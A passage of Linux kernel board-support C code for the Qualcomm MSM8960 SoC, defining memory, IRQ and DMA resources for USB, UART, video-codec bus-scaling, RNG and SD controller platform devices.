.start = MSM8960_PC_CNTR_PHYS,
.end = MSM8960_PC_CNTR_PHYS + MSM8960_PC_CNTR_SIZE,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_pc_cntr = {
.name = "pc-cntr",
.id = -1,
.num_resources = ARRAY_SIZE(msm8960_resources_pccntr),
.resource = msm8960_resources_pccntr,
};
static struct resource resources_otg[] = {
{
.start = MSM8960_HSUSB_PHYS,
.end = MSM8960_HSUSB_PHYS + MSM8960_HSUSB_SIZE,
.flags = IORESOURCE_MEM,
},
{
.start = USB1_HS_IRQ,
.end = USB1_HS_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_otg = {
.name = "msm_otg",
.id = -1,
.num_resources = ARRAY_SIZE(resources_otg),
.resource = resources_otg,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
static struct resource resources_hsusb[] = {
{
.start = MSM8960_HSUSB_PHYS,
.end = MSM8960_HSUSB_PHYS + MSM8960_HSUSB_SIZE,
.flags = IORESOURCE_MEM,
},
{
.start = USB1_HS_IRQ,
.end = USB1_HS_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_gadget_peripheral = {
.name = "msm_hsusb",
.id = -1,
.num_resources = ARRAY_SIZE(resources_hsusb),
.resource = resources_hsusb,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
static struct resource resources_hsusb_host[] = {
{
.start = MSM8960_HSUSB_PHYS,
.end = MSM8960_HSUSB_PHYS + MSM8960_HSUSB_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.start = USB1_HS_IRQ,
.end = USB1_HS_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static u64 dma_mask = DMA_BIT_MASK(32);
struct platform_device msm_device_hsusb_host = {
.name = "msm_hsusb_host",
.id = -1,
.num_resources = ARRAY_SIZE(resources_hsusb_host),
.resource = resources_hsusb_host,
.dev = {
.dma_mask = &dma_mask,
.coherent_dma_mask = 0xffffffff,
},
};
static struct resource resources_hsic_host[] = {
{
.start = 0x12520000,
.end = 0x12520000 + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
{
.start = USB_HSIC_IRQ,
.end = USB_HSIC_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_GPIO_TO_INT(69),
.end = MSM_GPIO_TO_INT(69),
.name = "peripheral_status_irq",
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm_device_hsic_host = {
.name = "msm_hsic_host",
.id = -1,
.num_resources = ARRAY_SIZE(resources_hsic_host),
.resource = resources_hsic_host,
.dev = {
.dma_mask = &dma_mask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
struct platform_device msm8960_device_acpuclk = {
.name = "acpuclk-8960",
.id = -1,
};
struct platform_device msm8960ab_device_acpuclk = {
.name = "acpuclk-8960ab",
.id = -1,
};
#define SHARED_IMEM_TZ_BASE 0x2a03f720
static struct resource tzlog_resources[] = {
{
.start = SHARED_IMEM_TZ_BASE,
.end = SHARED_IMEM_TZ_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm_device_tz_log = {
.name = "tz_log",
.id = 0,
.num_resources = ARRAY_SIZE(tzlog_resources),
.resource = tzlog_resources,
};
static struct resource resources_uart_gsbi2[] = {
{
.start = MSM8960_GSBI2_UARTDM_IRQ,
.end = MSM8960_GSBI2_UARTDM_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_UART2DM_PHYS,
.end = MSM_UART2DM_PHYS + PAGE_SIZE - 1,
.name = "uartdm_resource",
.flags = IORESOURCE_MEM,
},
{
.start = MSM_GSBI2_PHYS,
.end = MSM_GSBI2_PHYS + PAGE_SIZE - 1,
.name = "gsbi_resource",
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_uart_gsbi2 = {
.name = "msm_serial_hsl",
.id = 0,
.num_resources = ARRAY_SIZE(resources_uart_gsbi2),
.resource = resources_uart_gsbi2,
};
/* GSBI 6 used into UARTDM Mode */
static struct resource msm_uart_dm6_resources[] = {
{
.start = MSM_UART6DM_PHYS,
.end = MSM_UART6DM_PHYS + PAGE_SIZE - 1,
.name = "uartdm_resource",
.flags = IORESOURCE_MEM,
},
{
.start = GSBI6_UARTDM_IRQ,
.end = GSBI6_UARTDM_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_GSBI6_PHYS,
.end = MSM_GSBI6_PHYS + 4 - 1,
.name = "gsbi_resource",
.flags = IORESOURCE_MEM,
},
{
.start = DMOV_HSUART_GSBI6_TX_CHAN,
.end = DMOV_HSUART_GSBI6_RX_CHAN,
.name = "uartdm_channels",
.flags = IORESOURCE_DMA,
},
{
.start = DMOV_HSUART_GSBI6_TX_CRCI,
.end = DMOV_HSUART_GSBI6_RX_CRCI,
.name = "uartdm_crci",
.flags = IORESOURCE_DMA,
},
};
static u64 msm_uart_dm6_dma_mask = DMA_BIT_MASK(32);
struct platform_device msm_device_uart_dm6 = {
.name = "msm_serial_hs",
.id = 0,
.num_resources = ARRAY_SIZE(msm_uart_dm6_resources),
.resource = msm_uart_dm6_resources,
.dev = {
.dma_mask = &msm_uart_dm6_dma_mask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
/* GSBI 8 used into UARTDM Mode */
static struct resource msm_uart_dm8_resources[] = {
{
.start = MSM_UART8DM_PHYS,
.end = MSM_UART8DM_PHYS + PAGE_SIZE - 1,
.name = "uartdm_resource",
.flags = IORESOURCE_MEM,
},
{
.start = GSBI8_UARTDM_IRQ,
.end = GSBI8_UARTDM_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_GSBI8_PHYS,
.end = MSM_GSBI8_PHYS + 4 - 1,
.name = "gsbi_resource",
.flags = IORESOURCE_MEM,
},
{
.start = DMOV_HSUART_GSBI8_TX_CHAN,
.end = DMOV_HSUART_GSBI8_RX_CHAN,
.name = "uartdm_channels",
.flags = IORESOURCE_DMA,
},
{
.start = DMOV_HSUART_GSBI8_TX_CRCI,
.end = DMOV_HSUART_GSBI8_RX_CRCI,
.name = "uartdm_crci",
.flags = IORESOURCE_DMA,
},
};
static u64 msm_uart_dm8_dma_mask = DMA_BIT_MASK(32);
struct platform_device msm_device_uart_dm8 = {
.name = "msm_serial_hs",
.id = 2,
.num_resources = ARRAY_SIZE(msm_uart_dm8_resources),
.resource = msm_uart_dm8_resources,
.dev = {
.dma_mask = &msm_uart_dm8_dma_mask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
/*
* GSBI 9 used into UARTDM Mode
* For 8960 Fusion 2.2 Primary IPC
*/
static struct resource msm_uart_dm9_resources[] = {
{
.start = MSM_UART9DM_PHYS,
.end = MSM_UART9DM_PHYS + PAGE_SIZE - 1,
.name = "uartdm_resource",
.flags = IORESOURCE_MEM,
},
{
.start = GSBI9_UARTDM_IRQ,
.end = GSBI9_UARTDM_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_GSBI9_PHYS,
.end = MSM_GSBI9_PHYS + 4 - 1,
.name = "gsbi_resource",
.flags = IORESOURCE_MEM,
},
{
.start = DMOV_HSUART_GSBI9_TX_CHAN,
.end = DMOV_HSUART_GSBI9_RX_CHAN,
.name = "uartdm_channels",
.flags = IORESOURCE_DMA,
},
{
.start = DMOV_HSUART_GSBI9_TX_CRCI,
.end = DMOV_HSUART_GSBI9_RX_CRCI,
.name = "uartdm_crci",
.flags = IORESOURCE_DMA,
},
};
static u64 msm_uart_dm9_dma_mask = DMA_BIT_MASK(32);
struct platform_device msm_device_uart_dm9 = {
.name = "msm_serial_hs",
.id = 1,
.num_resources = ARRAY_SIZE(msm_uart_dm9_resources),
.resource = msm_uart_dm9_resources,
.dev = {
.dma_mask = &msm_uart_dm9_dma_mask,
.coherent_dma_mask = DMA_BIT_MASK(32),
},
};
static struct resource resources_uart_gsbi5[] = {
{
.start = GSBI5_UARTDM_IRQ,
.end = GSBI5_UARTDM_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_UART5DM_PHYS,
.end = MSM_UART5DM_PHYS + PAGE_SIZE - 1,
.name = "uartdm_resource",
.flags = IORESOURCE_MEM,
},
{
.start = MSM_GSBI5_PHYS,
.end = MSM_GSBI5_PHYS + PAGE_SIZE - 1,
.name = "gsbi_resource",
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_uart_gsbi5 = {
.name = "msm_serial_hsl",
.id = 0,
.num_resources = ARRAY_SIZE(resources_uart_gsbi5),
.resource = resources_uart_gsbi5,
};
static struct msm_serial_hslite_platform_data uart_gsbi8_pdata = {
.line = 0,
};
static struct resource resources_uart_gsbi8[] = {
{
.start = GSBI8_UARTDM_IRQ,
.end = GSBI8_UARTDM_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = MSM_UART8DM_PHYS,
.end = MSM_UART8DM_PHYS + PAGE_SIZE - 1,
.name = "uartdm_resource",
.flags = IORESOURCE_MEM,
},
{
.start = MSM_GSBI8_PHYS,
.end = MSM_GSBI8_PHYS + PAGE_SIZE - 1,
.name = "gsbi_resource",
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_uart_gsbi8 = {
.name = "msm_serial_hsl",
.id = 1,
.num_resources = ARRAY_SIZE(resources_uart_gsbi8),
.resource = resources_uart_gsbi8,
.dev.platform_data = &uart_gsbi8_pdata,
};
/* MSM Video core device */
#ifdef CONFIG_MSM_BUS_SCALING
static struct msm_bus_vectors vidc_init_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors vidc_venc_vga_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 54525952,
.ib = 436207616,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 72351744,
.ib = 289406976,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 1000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 1000000,
},
};
static struct msm_bus_vectors vidc_vdec_vga_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 40894464,
.ib = 327155712,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 48234496,
.ib = 192937984,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 2000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 2000000,
},
};
static struct msm_bus_vectors vidc_venc_720p_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 163577856,
.ib = 1308622848,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 219152384,
.ib = 876609536,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 3500000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 3500000,
},
};
static struct msm_bus_vectors vidc_vdec_720p_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 121634816,
.ib = 973078528,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 155189248,
.ib = 620756992,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 7000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 7000000,
},
};
static struct msm_bus_vectors vidc_venc_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 372244480,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 501219328,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 5000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 5000000,
},
};
static struct msm_bus_vectors vidc_vdec_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_vectors vidc_venc_1080p_turbo_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_vectors vidc_vdec_1080p_turbo_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_paths vidc_bus_client_config[] = {
{
ARRAY_SIZE(vidc_init_vectors),
vidc_init_vectors,
},
{
ARRAY_SIZE(vidc_venc_vga_vectors),
vidc_venc_vga_vectors,
},
{
ARRAY_SIZE(vidc_vdec_vga_vectors),
vidc_vdec_vga_vectors,
},
{
ARRAY_SIZE(vidc_venc_720p_vectors),
vidc_venc_720p_vectors,
},
{
ARRAY_SIZE(vidc_vdec_720p_vectors),
vidc_vdec_720p_vectors,
},
{
ARRAY_SIZE(vidc_venc_1080p_vectors),
vidc_venc_1080p_vectors,
},
{
ARRAY_SIZE(vidc_vdec_1080p_vectors),
vidc_vdec_1080p_vectors,
},
{
ARRAY_SIZE(vidc_venc_1080p_turbo_vectors),
vidc_venc_1080p_turbo_vectors,
},
{
ARRAY_SIZE(vidc_vdec_1080p_turbo_vectors),
vidc_vdec_1080p_turbo_vectors,
},
};
static struct msm_bus_scale_pdata vidc_bus_client_data = {
vidc_bus_client_config,
ARRAY_SIZE(vidc_bus_client_config),
.name = "vidc",
};
static struct msm_bus_vectors vidc_pro_init_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors vidc_pro_venc_vga_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 54525952,
.ib = 436207616,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 72351744,
.ib = 289406976,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 1000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 1000000,
},
};
static struct msm_bus_vectors vidc_pro_vdec_vga_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 40894464,
.ib = 327155712,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 48234496,
.ib = 192937984,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 2000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 500000,
.ib = 2000000,
},
};
static struct msm_bus_vectors vidc_pro_venc_720p_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 163577856,
.ib = 1308622848,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 219152384,
.ib = 876609536,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 3500000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 3500000,
},
};
static struct msm_bus_vectors vidc_pro_vdec_720p_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 121634816,
.ib = 973078528,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 155189248,
.ib = 620756992,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 7000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 1750000,
.ib = 7000000,
},
};
static struct msm_bus_vectors vidc_pro_venc_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 372244480,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 501219328,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 5000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 5000000,
},
};
static struct msm_bus_vectors vidc_pro_vdec_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_vectors vidc_pro_venc_1080p_turbo_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_vectors vidc_pro_vdec_1080p_turbo_vectors[] = {
{
.src = MSM_BUS_MASTER_VIDEO_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_VIDEO_DEC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_paths vidc_pro_bus_client_config[] = {
{
ARRAY_SIZE(vidc_pro_init_vectors),
vidc_pro_init_vectors,
},
{
ARRAY_SIZE(vidc_pro_venc_vga_vectors),
vidc_pro_venc_vga_vectors,
},
{
ARRAY_SIZE(vidc_pro_vdec_vga_vectors),
vidc_pro_vdec_vga_vectors,
},
{
ARRAY_SIZE(vidc_pro_venc_720p_vectors),
vidc_pro_venc_720p_vectors,
},
{
ARRAY_SIZE(vidc_pro_vdec_720p_vectors),
vidc_pro_vdec_720p_vectors,
},
{
ARRAY_SIZE(vidc_pro_venc_1080p_vectors),
vidc_pro_venc_1080p_vectors,
},
{
ARRAY_SIZE(vidc_pro_vdec_1080p_vectors),
vidc_pro_vdec_1080p_vectors,
},
{
ARRAY_SIZE(vidc_pro_venc_1080p_turbo_vectors),
vidc_pro_venc_1080p_turbo_vectors,
},
{
ARRAY_SIZE(vidc_vdec_1080p_turbo_vectors),
vidc_pro_vdec_1080p_turbo_vectors,
},
};
static struct msm_bus_scale_pdata vidc_pro_bus_client_data = {
vidc_pro_bus_client_config,
ARRAY_SIZE(vidc_bus_client_config),
.name = "vidc",
};
#endif
#ifdef CONFIG_HW_RANDOM_MSM
/* PRNG device */
#define MSM_PRNG_PHYS 0x1A500000
static struct resource rng_resources = {
.flags = IORESOURCE_MEM,
.start = MSM_PRNG_PHYS,
.end = MSM_PRNG_PHYS + SZ_512 - 1,
};
struct platform_device msm_device_rng = {
.name = "msm_rng",
.id = 0,
.num_resources = 1,
.resource = &rng_resources,
};
#endif
#define MSM_VIDC_BASE_PHYS 0x04400000
#define MSM_VIDC_BASE_SIZE 0x00100000
static struct resource msm_device_vidc_resources[] = {
{
.start = MSM_VIDC_BASE_PHYS,
.end = MSM_VIDC_BASE_PHYS + MSM_VIDC_BASE_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.start = VCODEC_IRQ,
.end = VCODEC_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct msm_vidc_platform_data vidc_platform_data = {
#ifdef CONFIG_MSM_BUS_SCALING
.vidc_bus_client_pdata = &vidc_bus_client_data,
#endif
#ifdef CONFIG_MSM_MULTIMEDIA_USE_ION
.memtype = ION_CP_MM_HEAP_ID,
.enable_ion = 1,
.cp_enabled = 1,
#else
.memtype = MEMTYPE_EBI1,
.enable_ion = 0,
#endif
.disable_dmx = 0,
.disable_fullhd = 0,
.cont_mode_dpb_count = 18,
.fw_addr = 0x9fe00000,
.enable_sec_metadata = 0,
};
struct platform_device msm_device_vidc = {
.name = "msm_vidc",
.id = 0,
.num_resources = ARRAY_SIZE(msm_device_vidc_resources),
.resource = msm_device_vidc_resources,
.dev = {
.platform_data = &vidc_platform_data,
},
};
#define MSM_SDC1_BASE 0x12400000
#define MSM_SDC1_DML_BASE (MSM_SDC1_BASE + 0x800)
#define MSM_SDC1_BAM_BASE (MSM_SDC1_BASE + 0x2000)
#define MSM_SDC2_BASE 0x12140000
#define MSM_SDC2_DML_BASE (MSM_SDC2_BASE + 0x800)
#define MSM_SDC2_BAM_BASE (MSM_SDC2_BASE + 0x2000)
#define MSM_SDC3_BASE 0x12180000
#define MSM_SDC3_DML_BASE (MSM_SDC3_BASE + 0x800)
#define MSM_SDC3_BAM_BASE (MSM_SDC3_BASE + 0x2000)
#define MSM_SDC4_BASE 0x121C0000
#define MSM_SDC4_DML_BASE (MSM_SDC4_BASE + 0x800)
#define MSM_SDC4_BAM_BASE (MSM_SDC4_BASE + 0x2000)
#define MSM_SDC5_BASE 0x12200000
#define MSM_SDC5_DML_BASE (MSM_SDC5_BASE + 0x800)
#define MSM_SDC5_BAM_BASE (MSM_SDC5_BASE + 0x2000)
static struct resource resources_sdc1[] = {
{
.name = "core_mem",
.flags = IORESOURCE_MEM,
.start = MSM_SDC1_BASE,
.end = MSM_SDC1_DML_BASE - 1,
},
{
.name = "core_irq",
.flags = IORESOURCE_IRQ,
.start = SDC1_IRQ_0,
.end = SDC1_IRQ_0
},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
{
.name = "dml_mem",
.start = MSM_SDC1_DML_BASE,
.end = MSM_SDC1_BAM_BASE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_mem",
.start = MSM_SDC1_BAM_BASE,
.end = MSM_SDC1_BAM_BASE + (2 * SZ_4K) - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_irq",
.start = SDC1_BAM_IRQ,
.end = SDC1_BAM_IRQ,
.flags = IORESOURCE_IRQ,
},
#endif
};
static struct resource resources_sdc2[] = {
{
.name = "core_mem",
.flags = IORESOURCE_MEM,
.start = MSM_SDC2_BASE,
.end = MSM_SDC2_DML_BASE - 1,
},
{
.name = "core_irq",
.flags = IORESOURCE_IRQ,
.start = SDC2_IRQ_0,
.end = SDC2_IRQ_0
},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
{
.name = "dml_mem",
.start = MSM_SDC2_DML_BASE,
.end = MSM_SDC2_BAM_BASE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_mem",
.start = MSM_SDC2_BAM_BASE,
.end = MSM_SDC2_BAM_BASE + (2 * SZ_4K) - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_irq",
.start = SDC2_BAM_IRQ,
.end = SDC2_BAM_IRQ,
.flags = IORESOURCE_IRQ,
},
#endif
};
static struct resource resources_sdc3[] = {
{
.name = "core_mem",
.flags = IORESOURCE_MEM,
.start = MSM_SDC3_BASE,
.end = MSM_SDC3_DML_BASE - 1,
},
{
.name = "core_irq",
.flags = IORESOURCE_IRQ,
.start = SDC3_IRQ_0,
.end = SDC3_IRQ_0
},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
{
.name = "dml_mem",
.start = MSM_SDC3_DML_BASE,
.end = MSM_SDC3_BAM_BASE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_mem",
.start = MSM_SDC3_BAM_BASE,
.end = MSM_SDC3_BAM_BASE + (2 * SZ_4K) - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_irq",
.start = SDC3_BAM_IRQ,
.end = SDC3_BAM_IRQ,
.flags = IORESOURCE_IRQ,
},
#endif
};
static struct resource resources_sdc4[] = {
{
.name = "core_mem",
.flags = IORESOURCE_MEM,
.start = MSM_SDC4_BASE,
.end = MSM_SDC4_DML_BASE - 1,
},
{
.name = "core_irq",
.flags = IORESOURCE_IRQ,
.start = SDC4_IRQ_0,
.end = SDC4_IRQ_0
},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
{
.name = "dml_mem",
.start = MSM_SDC4_DML_BASE,
.end = MSM_SDC4_BAM_BASE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_mem",
.start = MSM_SDC4_BAM_BASE,
.end = MSM_SDC4_BAM_BASE + (2 * SZ_4K) - 1,
